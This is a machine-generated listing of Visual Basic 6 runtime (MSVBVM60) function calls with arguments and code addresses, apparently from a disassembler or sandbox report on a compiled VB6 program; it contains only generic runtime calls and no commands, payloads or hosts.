__vbaObjSet.MSVBVM60(?,00000000), ref: 004148C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000100), ref: 00414915
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041493A
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00414955
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414991
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000110), ref: 004149DE
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414A03
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00414A1E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414A5A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000198), ref: 00414AA7
__vbaI4Var.MSVBVM60(?,?,?,?,?), ref: 00414ADA
__vbaI4Var.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00414AE7
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?,?,?,?,?), ref: 00414AFE
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?), ref: 00414B47
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414B5F
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00414B90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00414BF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000078), ref: 00414C51
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000078), ref: 00414C76
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00414C95
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00414CFA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 00414D5C
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 00414D81
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00414DA0
__vbaObjVar.MSVBVM60(00000000), ref: 00414DCD
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00414DDA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000010), ref: 00414E15
__vbaFreeObj.MSVBVM60(00000000,?,00405068,00000010), ref: 00414E2F
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00414E4E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414E8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,0000020C), ref: 00414ED0
__vbaFreeObj.MSVBVM60(00000000,?,00405038,0000020C), ref: 00414EEA
#647.MSVBVM60(?,0000000A), ref: 00414F18
__vbaVarTstEq.MSVBVM60(00008008,?,?,0000000A), ref: 00414F3F
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00008008,?,?,0000000A), ref: 00414F5B
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00414FE3
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00415005
#610.MSVBVM60(?), ref: 0041501B
#552.MSVBVM60(?,?,00000001,?), ref: 00415030
__vbaVarMove.MSVBVM60(?,?,00000001,?), ref: 0041503E
__vbaFreeVar.MSVBVM60(?,?,00000001,?), ref: 00415049
__vbaNew2.MSVBVM60(00404358,00425010), ref: 004150E7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415123
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000120), ref: 00415170
#596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004151DE
__vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004151E8
__vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004151F3
__vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041522B
__vbaI4Str.MSVBVM60(004050BC), ref: 0041523F
__vbaNew2.MSVBVM60(00405078,00425698,004050BC), ref: 00415267
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004152CC
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00415313
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041534F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000001C0), ref: 0041539C
__vbaChkstk.MSVBVM60(00000000,?,00405038,000001C0), ref: 004153B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,0000013C), ref: 00415405
__vbaFreeStr.MSVBVM60(00000000,?,004050A8,0000013C), ref: 0041541F
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00415434
__vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000001,00000044,00000000,?,?,004050BC), ref: 00415459
__vbaDerefAry1.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004050BC), ref: 00415475
__vbaStrCopy.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004050BC), ref: 0041547E
__vbaNew2.MSVBVM60(00404358,00425010,?,00000000,?,?,?,?,?,?,?,?,?,004050BC), ref: 0041549D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004154D9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000001C0), ref: 00415526
__vbaDerefAry1.MSVBVM60(?,00000001), ref: 00415548
__vbaStrCopy.MSVBVM60(?,00000001), ref: 00415551
__vbaFreeStr.MSVBVM60(?,00000001), ref: 0041555C
__vbaFreeObj.MSVBVM60(?,00000001), ref: 00415567
__vbaDerefAry1.MSVBVM60(?,00000002,?,00000001), ref: 00415580
__vbaStrCopy.MSVBVM60(?,00000002,?,00000001), ref: 00415589
__vbaDerefAry1.MSVBVM60(?,00000003,?,00000002,?,00000001), ref: 004155A2
__vbaStrCopy.MSVBVM60(?,00000003,?,00000002,?,00000001), ref: 004155AB
__vbaNew2.MSVBVM60(00404358,00425010,?,00000003,?,00000002,?,00000001), ref: 004155CA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415606
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000A8), ref: 00415653
__vbaDerefAry1.MSVBVM60(?,00000004), ref: 00415675
__vbaStrCopy.MSVBVM60(?,00000004), ref: 0041567E
__vbaFreeStr.MSVBVM60(?,00000004), ref: 00415689
__vbaFreeObj.MSVBVM60(?,00000004), ref: 00415694
__vbaNew2.MSVBVM60(00404358,00425010,?,00000004), ref: 004156B3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004156EF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000048), ref: 00415736
__vbaDerefAry1.MSVBVM60(?,00000005), ref: 00415758
__vbaStrCopy.MSVBVM60(?,00000005), ref: 00415761
__vbaFreeStr.MSVBVM60(?,00000005), ref: 0041576C
__vbaFreeObj.MSVBVM60(?,00000005), ref: 00415777
__vbaDerefAry1.MSVBVM60(?,00000006,?,00000005), ref: 00415790
__vbaStrCopy.MSVBVM60(?,00000006,?,00000005), ref: 00415799
__vbaDerefAry1.MSVBVM60(?,00000007,?,00000006,?,00000005), ref: 004157B2
__vbaStrCopy.MSVBVM60(?,00000007,?,00000006,?,00000005), ref: 004157BB
__vbaDerefAry1.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005), ref: 004157D4
__vbaStrCopy.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005), ref: 004157DD
__vbaDerefAry1.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 004157F6
__vbaStrCopy.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 004157FF
__vbaNew2.MSVBVM60(00404358,00425010,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 0041581E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041585A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000F8), ref: 004158A9
__vbaDerefAry1.MSVBVM60(?,0000000A), ref: 004158CB
__vbaStrCopy.MSVBVM60(?,0000000A), ref: 004158D4
__vbaFreeStr.MSVBVM60(?,0000000A), ref: 004158DF
__vbaFreeObj.MSVBVM60(?,0000000A), ref: 004158EA
__vbaNew2.MSVBVM60(00404358,00425010,?,0000000A), ref: 00415909
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415945
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000130), ref: 00415992
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004159B7
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004050BC), ref: 004159C0
__vbaStrMove.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004050BC), ref: 004159CD
__vbaDerefAry1.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 004159DC
__vbaStrCopy.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 004159E5
__vbaFreeStr.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 004159F0
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00415A05
__vbaFreeVar.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 00415A13
__vbaNew2.MSVBVM60(00404358,00425010,?,0000000B,00000000,?,?,?,00000000), ref: 00415A32
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415A6E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000048), ref: 00415AB5
__vbaDerefAry1.MSVBVM60(?,0000000C), ref: 00415AD7
__vbaStrCopy.MSVBVM60(?,0000000C), ref: 00415AE0
__vbaFreeStr.MSVBVM60(?,0000000C), ref: 00415AEB
__vbaFreeObj.MSVBVM60(?,0000000C), ref: 00415AF6
__vbaDerefAry1.MSVBVM60(?,0000000D,?,0000000C), ref: 00415B0F
__vbaStrCopy.MSVBVM60(?,0000000D,?,0000000C), ref: 00415B18
__vbaNew2.MSVBVM60(00404358,00425010,?,0000000D,?,0000000C), ref: 00415B37
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415B73
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,000000E8), ref: 00415BC2
__vbaDerefAry1.MSVBVM60(?,0000000E), ref: 00415BE4
__vbaStrCopy.MSVBVM60(?,0000000E), ref: 00415BED
__vbaFreeStr.MSVBVM60(?,0000000E), ref: 00415BF8
__vbaFreeObj.MSVBVM60(?,0000000E), ref: 00415C03
__vbaDerefAry1.MSVBVM60(?,0000000F,?,0000000E), ref: 00415C1C
__vbaStrCopy.MSVBVM60(?,0000000F,?,0000000E), ref: 00415C25
__vbaNew2.MSVBVM60(00404358,00425010,?,0000000F,?,0000000E), ref: 00415C44
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415C80
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000188), ref: 00415CCD
__vbaDerefAry1.MSVBVM60(?,00000010), ref: 00415CEF
__vbaStrCopy.MSVBVM60(?,00000010), ref: 00415CF8
__vbaFreeStr.MSVBVM60(?,00000010), ref: 00415D03
__vbaFreeObj.MSVBVM60(?,00000010), ref: 00415D0E
__vbaDerefAry1.MSVBVM60(?,00000011,?,00000010), ref: 00415D27
__vbaStrCopy.MSVBVM60(?,00000011,?,00000010), ref: 00415D30
__vbaDerefAry1.MSVBVM60(?,00000012,?,00000011,?,00000010), ref: 00415D49
__vbaStrCopy.MSVBVM60(?,00000012,?,00000011,?,00000010), ref: 00415D52
__vbaDerefAry1.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415D6B
__vbaStrCopy.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415D74
__vbaNew2.MSVBVM60(00404358,00425010,?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415D93
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415DCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000188), ref: 00415E1C
__vbaDerefAry1.MSVBVM60(?,00000014), ref: 00415E3E
__vbaStrCopy.MSVBVM60(?,00000014), ref: 00415E47
__vbaFreeStr.MSVBVM60(?,00000014), ref: 00415E52
__vbaFreeObj.MSVBVM60(?,00000014), ref: 00415E5D
__vbaDerefAry1.MSVBVM60(?,00000015,?,00000014), ref: 00415E76
__vbaStrCopy.MSVBVM60(?,00000015,?,00000014), ref: 00415E7F
__vbaDerefAry1.MSVBVM60(?,00000016,?,00000015,?,00000014), ref: 00415E98
__vbaStrCopy.MSVBVM60(?,00000016,?,00000015,?,00000014), ref: 00415EA1
__vbaNew2.MSVBVM60(00404358,00425010,?,00000016,?,00000015,?,00000014), ref: 00415EC0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415EFC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000110), ref: 00415F49
__vbaDerefAry1.MSVBVM60(?,00000017), ref: 00415F6B
__vbaStrCopy.MSVBVM60(?,00000017), ref: 00415F74
__vbaFreeStr.MSVBVM60(?,00000017), ref: 00415F7F
__vbaFreeObj.MSVBVM60(?,00000017), ref: 00415F8A
__vbaDerefAry1.MSVBVM60(?,00000018,?,00000017), ref: 00415FA3
__vbaStrCopy.MSVBVM60(?,00000018,?,00000017), ref: 00415FAC
__vbaDerefAry1.MSVBVM60(?,00000019,?,00000018,?,00000017), ref: 00415FC5
__vbaStrCopy.MSVBVM60(?,00000019,?,00000018,?,00000017), ref: 00415FCE
__vbaNew2.MSVBVM60(00404358,00425010,?,00000019,?,00000018,?,00000017), ref: 00415FED
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416029
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000001C0), ref: 00416076
__vbaDerefAry1.MSVBVM60(?,0000001A), ref: 00416098
__vbaStrCopy.MSVBVM60(?,0000001A), ref: 004160A1
__vbaFreeStr.MSVBVM60(?,0000001A), ref: 004160AC
__vbaFreeObj.MSVBVM60(?,0000001A), ref: 004160B7
__vbaDerefAry1.MSVBVM60(?,0000001B,?,0000001A), ref: 004160D0
__vbaStrCopy.MSVBVM60(?,0000001B,?,0000001A), ref: 004160D9
__vbaNew2.MSVBVM60(00404358,00425010,?,0000001B,?,0000001A), ref: 004160F8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416134
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000F8), ref: 00416183
__vbaDerefAry1.MSVBVM60(?,0000001C), ref: 004161A5
__vbaStrCopy.MSVBVM60(?,0000001C), ref: 004161AE
__vbaFreeStr.MSVBVM60(?,0000001C), ref: 004161B9
__vbaFreeObj.MSVBVM60(?,0000001C), ref: 004161C4
__vbaNew2.MSVBVM60(00404358,00425010,?,0000001C), ref: 004161E3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041621F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004052AC,00000070), ref: 00416266
__vbaDerefAry1.MSVBVM60(?,0000001D), ref: 00416288
__vbaStrCopy.MSVBVM60(?,0000001D), ref: 00416291
__vbaFreeStr.MSVBVM60(?,0000001D), ref: 0041629C
__vbaFreeObj.MSVBVM60(?,0000001D), ref: 004162A7
__vbaDerefAry1.MSVBVM60(?,0000001E,?,0000001D), ref: 004162C0
__vbaStrCopy.MSVBVM60(?,0000001E,?,0000001D), ref: 004162C9
__vbaNew2.MSVBVM60(00404358,00425010,?,0000001E,?,0000001D), ref: 004162E8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416324
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000F8), ref: 00416373
__vbaDerefAry1.MSVBVM60(?,0000001F), ref: 00416395
__vbaStrCopy.MSVBVM60(?,0000001F), ref: 0041639E
__vbaFreeStr.MSVBVM60(?,0000001F), ref: 004163A9
__vbaFreeObj.MSVBVM60(?,0000001F), ref: 004163B4
__vbaDerefAry1.MSVBVM60(?,00000020,?,0000001F), ref: 004163CD
__vbaStrCopy.MSVBVM60(?,00000020,?,0000001F), ref: 004163D6
__vbaNew2.MSVBVM60(00404358,00425010,?,00000020,?,0000001F), ref: 004163F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416431
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000190), ref: 0041647E
__vbaDerefAry1.MSVBVM60(?,00000021), ref: 004164A0
__vbaStrCopy.MSVBVM60(?,00000021), ref: 004164A9
__vbaFreeStr.MSVBVM60(?,00000021), ref: 004164B4
__vbaFreeObj.MSVBVM60(?,00000021), ref: 004164BF
__vbaNew2.MSVBVM60(00404358,00425010,?,00000021), ref: 004164DE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041651A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000120), ref: 00416567
__vbaDerefAry1.MSVBVM60(?,00000022), ref: 00416589
__vbaStrCopy.MSVBVM60(?,00000022), ref: 00416592
__vbaFreeStr.MSVBVM60(?,00000022), ref: 0041659D
__vbaFreeObj.MSVBVM60(?,00000022), ref: 004165A8
__vbaNew2.MSVBVM60(00404358,00425010,?,00000022), ref: 004165C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416603
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000001C0), ref: 00416650
__vbaDerefAry1.MSVBVM60(?,00000023), ref: 00416672
__vbaStrCopy.MSVBVM60(?,00000023), ref: 0041667B
__vbaFreeStr.MSVBVM60(?,00000023), ref: 00416686
__vbaFreeObj.MSVBVM60(?,00000023), ref: 00416691
__vbaDerefAry1.MSVBVM60(?,00000024,?,00000023), ref: 004166AA
__vbaStrCopy.MSVBVM60(?,00000024,?,00000023), ref: 004166B3
__vbaNew2.MSVBVM60(00404358,00425010,?,00000024,?,00000023), ref: 004166D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041670E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000F8), ref: 0041675D
__vbaDerefAry1.MSVBVM60(?,00000025), ref: 0041677F
__vbaStrCopy.MSVBVM60(?,00000025), ref: 00416788
__vbaFreeStr.MSVBVM60(?,00000025), ref: 00416793
__vbaFreeObj.MSVBVM60(?,00000025), ref: 0041679E
__vbaNew2.MSVBVM60(00404358,00425010,?,00000025), ref: 004167BD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004167F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000140), ref: 00416846
__vbaDerefAry1.MSVBVM60(?,00000026), ref: 00416868
__vbaStrCopy.MSVBVM60(?,00000026), ref: 00416871
__vbaFreeStr.MSVBVM60(?,00000026), ref: 0041687C
__vbaFreeObj.MSVBVM60(?,00000026), ref: 00416887
__vbaNew2.MSVBVM60(00404358,00425010,?,00000026), ref: 004168A6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004168E2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000188), ref: 0041692F
__vbaDerefAry1.MSVBVM60(?,00000027), ref: 00416951
__vbaStrCopy.MSVBVM60(?,00000027), ref: 0041695A
__vbaFreeStr.MSVBVM60(?,00000027), ref: 00416965
__vbaFreeObj.MSVBVM60(?,00000027), ref: 00416970
__vbaDerefAry1.MSVBVM60(?,00000028,?,00000027), ref: 00416989
__vbaStrCopy.MSVBVM60(?,00000028,?,00000027), ref: 00416992
__vbaNew2.MSVBVM60(00404358,00425010,?,00000028,?,00000027), ref: 004169B1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004169ED
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000218), ref: 00416A3A
__vbaDerefAry1.MSVBVM60(?,00000029), ref: 00416A5C
__vbaStrCopy.MSVBVM60(?,00000029), ref: 00416A65
__vbaFreeStr.MSVBVM60(?,00000029), ref: 00416A70
__vbaFreeObj.MSVBVM60(?,00000029), ref: 00416A7B
__vbaNew2.MSVBVM60(00404358,00425010,?,00000029), ref: 00416A9A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416AD6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000048), ref: 00416B1D
__vbaDerefAry1.MSVBVM60(?,0000002A), ref: 00416B3F
__vbaStrCopy.MSVBVM60(?,0000002A), ref: 00416B48
__vbaFreeStr.MSVBVM60(?,0000002A), ref: 00416B53
__vbaFreeObj.MSVBVM60(?,0000002A), ref: 00416B5E
__vbaNew2.MSVBVM60(00404358,00425010,?,0000002A), ref: 00416B7D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416BB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000188), ref: 00416C06
__vbaDerefAry1.MSVBVM60(?,0000002B), ref: 00416C28
__vbaStrCopy.MSVBVM60(?,0000002B), ref: 00416C31
__vbaFreeStr.MSVBVM60(?,0000002B), ref: 00416C3C
__vbaFreeObj.MSVBVM60(?,0000002B), ref: 00416C47
__vbaNew2.MSVBVM60(00404358,00425010,?,0000002B), ref: 00416C66
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416CA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000140), ref: 00416CEF
__vbaDerefAry1.MSVBVM60(?,0000002C), ref: 00416D11
__vbaStrCopy.MSVBVM60(?,0000002C), ref: 00416D1A
__vbaFreeStr.MSVBVM60(?,0000002C), ref: 00416D25
__vbaFreeObj.MSVBVM60(?,0000002C), ref: 00416D30
__vbaDerefAry1.MSVBVM60(?,0000002D,?,0000002C), ref: 00416D49
__vbaStrCopy.MSVBVM60(?,0000002D,?,0000002C), ref: 00416D52
__vbaNew2.MSVBVM60(00404358,00425010,?,0000002D,?,0000002C), ref: 00416D71
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416DAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000048), ref: 00416DF4
__vbaDerefAry1.MSVBVM60(?,0000002E), ref: 00416E16
__vbaStrCopy.MSVBVM60(?,0000002E), ref: 00416E1F
__vbaFreeStr.MSVBVM60(?,0000002E), ref: 00416E2A
__vbaFreeObj.MSVBVM60(?,0000002E), ref: 00416E35
__vbaNew2.MSVBVM60(00404358,00425010,?,0000002E), ref: 00416E54
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416E90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000120), ref: 00416EDD
__vbaDerefAry1.MSVBVM60(?,0000002F), ref: 00416EFF
__vbaStrCopy.MSVBVM60(?,0000002F), ref: 00416F08
__vbaFreeStr.MSVBVM60(?,0000002F), ref: 00416F13
__vbaFreeObj.MSVBVM60(?,0000002F), ref: 00416F1E
__vbaDerefAry1.MSVBVM60(?,00000030,?,0000002F), ref: 00416F37
__vbaStrCopy.MSVBVM60(?,00000030,?,0000002F), ref: 00416F40
__vbaDerefAry1.MSVBVM60(?,00000031,?,00000030,?,0000002F), ref: 00416F59
__vbaStrCopy.MSVBVM60(?,00000031,?,00000030,?,0000002F), ref: 00416F62
__vbaDerefAry1.MSVBVM60(?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416F7B
__vbaStrCopy.MSVBVM60(?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416F84
__vbaNew2.MSVBVM60(00404358,00425010,?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416FA3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416FDF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000048), ref: 00417026
__vbaDerefAry1.MSVBVM60(?,00000033), ref: 00417048
__vbaStrCopy.MSVBVM60(?,00000033), ref: 00417051
__vbaFreeStr.MSVBVM60(?,00000033), ref: 0041705C
__vbaFreeObj.MSVBVM60(?,00000033), ref: 00417067
__vbaDerefAry1.MSVBVM60(?,00000034,?,00000033), ref: 00417080
__vbaStrCopy.MSVBVM60(?,00000034,?,00000033), ref: 00417089
__vbaDerefAry1.MSVBVM60(?,00000035,?,00000034,?,00000033), ref: 004170A2
__vbaStrCopy.MSVBVM60(?,00000035,?,00000034,?,00000033), ref: 004170AB
__vbaNew2.MSVBVM60(00404358,00425010,?,00000035,?,00000034,?,00000033), ref: 004170CA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417106
__vbaHresultCheckObj.MSVBVM60(00000000,?,004052AC,00000048), ref: 0041714D
__vbaDerefAry1.MSVBVM60(?,00000036), ref: 0041716F
__vbaStrCopy.MSVBVM60(?,00000036), ref: 00417178
__vbaFreeStr.MSVBVM60(?,00000036), ref: 00417183
__vbaFreeObj.MSVBVM60(?,00000036), ref: 0041718E
__vbaNew2.MSVBVM60(00404358,00425010,?,00000036), ref: 004171AD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004171E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000A8), ref: 00417236
__vbaDerefAry1.MSVBVM60(?,00000037), ref: 00417258
__vbaStrCopy.MSVBVM60(?,00000037), ref: 00417261
__vbaFreeStr.MSVBVM60(?,00000037), ref: 0041726C
__vbaFreeObj.MSVBVM60(?,00000037), ref: 00417277
__vbaDerefAry1.MSVBVM60(?,00000038,?,00000037), ref: 00417290
__vbaStrCopy.MSVBVM60(?,00000038,?,00000037), ref: 00417299
__vbaDerefAry1.MSVBVM60(?,00000039,?,00000038,?,00000037), ref: 004172B2
__vbaStrCopy.MSVBVM60(?,00000039,?,00000038,?,00000037), ref: 004172BB
__vbaNew2.MSVBVM60(00404358,00425010,?,00000039,?,00000038,?,00000037), ref: 004172DA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417316
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000140), ref: 00417363
__vbaDerefAry1.MSVBVM60(?,0000003A), ref: 00417385
__vbaStrCopy.MSVBVM60(?,0000003A), ref: 0041738E
__vbaFreeStr.MSVBVM60(?,0000003A), ref: 00417399
__vbaFreeObj.MSVBVM60(?,0000003A), ref: 004173A4
__vbaDerefAry1.MSVBVM60(?,0000003B,?,0000003A), ref: 004173BD
__vbaStrCopy.MSVBVM60(?,0000003B,?,0000003A), ref: 004173C6
__vbaDerefAry1.MSVBVM60(?,0000003C,?,0000003B,?,0000003A), ref: 004173DF
__vbaStrCopy.MSVBVM60(?,0000003C,?,0000003B,?,0000003A), ref: 004173E8
__vbaDerefAry1.MSVBVM60(?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 00417401
__vbaStrCopy.MSVBVM60(?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 0041740A
__vbaNew2.MSVBVM60(00404358,00425010,?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 00417429
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417465
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000180), ref: 004174B2
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004174D7
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174E0
__vbaStrMove.MSVBVM60(00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174ED
__vbaDerefAry1.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174FC
__vbaStrCopy.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417505
__vbaFreeStr.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417510
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?), ref: 00417525
__vbaFreeVar.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417533
__vbaDerefAry1.MSVBVM60(?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 0041754C
__vbaStrCopy.MSVBVM60(?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417555
__vbaNew2.MSVBVM60(00404358,00425010,?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000), ref: 00417574
__vbaObjSet.MSVBVM60(?,00000000), ref: 004175B0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000A8), ref: 004175FD
__vbaDerefAry1.MSVBVM60(?,00000040), ref: 0041761F
__vbaStrCopy.MSVBVM60(?,00000040), ref: 00417628
__vbaFreeStr.MSVBVM60(?,00000040), ref: 00417633
__vbaFreeObj.MSVBVM60(?,00000040), ref: 0041763E
__vbaDerefAry1.MSVBVM60(?,00000041,?,00000040), ref: 00417657
__vbaStrCopy.MSVBVM60(?,00000041,?,00000040), ref: 00417660
__vbaDerefAry1.MSVBVM60(?,00000042,?,00000041,?,00000040), ref: 00417679
__vbaStrCopy.MSVBVM60(?,00000042,?,00000041,?,00000040), ref: 00417682
__vbaDerefAry1.MSVBVM60(?,00000043,?,00000042,?,00000041,?,00000040), ref: 0041769B
__vbaStrCopy.MSVBVM60(?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176A4
__vbaDerefAry1.MSVBVM60(?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176BD
__vbaStrCopy.MSVBVM60(?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176C6
__vbaNew2.MSVBVM60(00405078,00425698,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176EC
__vbaChkstk.MSVBVM60(?,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 00417747
__vbaChkstk.MSVBVM60(?,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 0041775B
